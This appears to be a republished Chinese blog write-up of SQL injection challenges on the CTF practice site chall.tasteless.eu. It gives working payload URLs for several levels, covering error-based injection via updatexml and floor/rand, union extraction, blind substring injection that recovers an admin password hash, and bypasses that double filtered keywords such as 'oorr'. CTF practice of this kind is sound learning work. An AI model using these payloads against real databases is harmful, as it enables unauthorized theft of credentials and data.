chall.tasteless.eu 中的注入题

Posted 羊小弟

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了chall.tasteless.eu 中的注入题相关的知识,希望对你有一定的参考价值。

第一题好像就很难,看了payload,算是涨见识了,感觉有点为了猜而猜。

题目给我们的时候是这样的:http://chall.tasteless.eu/level1/index.php?dir=ASC

asc,desc  一对好基友,所以猜测是order by 后的注入。然后有个提示:Capture the flag! hint: table level1_flag column flag  No Bsqli!!

不用布尔型注入。想法就是报错注入, 

技术分享

然后把语句丢上去。

http://chall.tasteless.eu/level1/index.php?dir=and (updatexml(1,concat(1,(select flag from level1_flag limit 0,1),1),1))--+     直接返回错误,应该是关闭错误回显吧,也可能是括号构造的不够多,没有闭合更前面的括号。

后来看了答案在知道整个语句下的测试:

http://chall.tasteless.eu/level1/index.php?dir=and (updatexml(1,concat(1,(select flag from level1_flag limit 0,1),1),1)))--+

比上面多了个括号,还是报错,把limit 增加上去。

http://chall.tasteless.eu/level1/index.php?dir=and (updatexml(1,concat(1,(select flag from level1_flag limit 1,1),1),1)))--+

技术分享

这时返回正确,说明语句对了,更前面需要一个括号,然后他关闭了报错语句。

判断如下。当limit小于表中的列数,报错并返回数据,如果limit大于等于表中的列数,返回全部结果。也就是页面返回正常,所以判断为关闭了报错语句。

技术分享

写不出来就去找答案了。http://qkqhxla1.tistory.com/m/191

他猜的过程都在链接里,(select * from table order by 1 $_GET[‘dir‘]);

语句是这样的,括号在最前面,还是第一次看到这么写,闭合括号然后就能union了,

一开始判断为order by注入,然后按着order by 注入一路走,因为order by 后面不能跟union,所以正常的出数据只能靠布尔型或者报错来判断。下次遇到这样的就能想到这题了。

mysql> (select 1) union (select 2);
+---+
| 1 |
+---+
| 1 |
| 2 |
+---+
2 rows in set (0.00 sec)

  

第二题就比较友好了,一分钟就出来了。

http://chall.tasteless.eu/level2/index.php?req=f‘ union (select 1,2,flag from level2_flag)--+

 

第四题:

不懂flag的格式:

用guest guest 登录以后,id存在注入

http://chall.tasteless.eu/level4/index.php?action=pm&id=1 and ‘b‘=substr((select pass from level4 where username=‘admin‘),1,1)--+

正则匹配出现union字符串就报错,用盲注的形式。

注入出来admin的密码是98aa0ec014a46e34571affaf88999ebb

登录不了,不知道属不属于flag。

-----------

第六题:

http://chall.tasteless.eu/level6/index.php?in=,(select 1 from (select count(1),concat((select flag from level6_flag),floo*r(ra*nd(0)^2))x from (select 1 union select 2 union select 3)a group by x)b)%23

第一个语句中规中矩的报错注入,但是要注意的点就是过滤了or and * ,但是过滤的方式是替换成空,所以在某些关键字上要加一次,比如floor rand  都有出现or和and。

一开始不是用这个的,是用updatexml  extractvalue 这两个函数,但是无论怎么加,最后还是过滤了,直接被die()掉.

 

http://chall.tasteless.eu/level6/index.php?in=,(coalesce((select flag from level6_flag where hex(substr(flag,1,1))=hex(98) oorr null limit 1),(select 1 union select 2)))%23

第二个就比较有意思了,第一次见这个函数,明天再百度一下。如果要复制的时候注意oorr,只有一个or。是为了绕过滤才写oorr。

 

以上是关于chall.tasteless.eu 中的注入题的主要内容,如果未能解决你的问题,请参考以下文章

阶乘和

实战 | 代码审计中的SQL注入和预编译中的SQL注入

拓扑排序详解

sql注入浅谈sql注入中的Post注入

译 Node.js 中的依赖注入

Angular 2 中的依赖注入在使用内联注入器和构造器注入时创建多个实例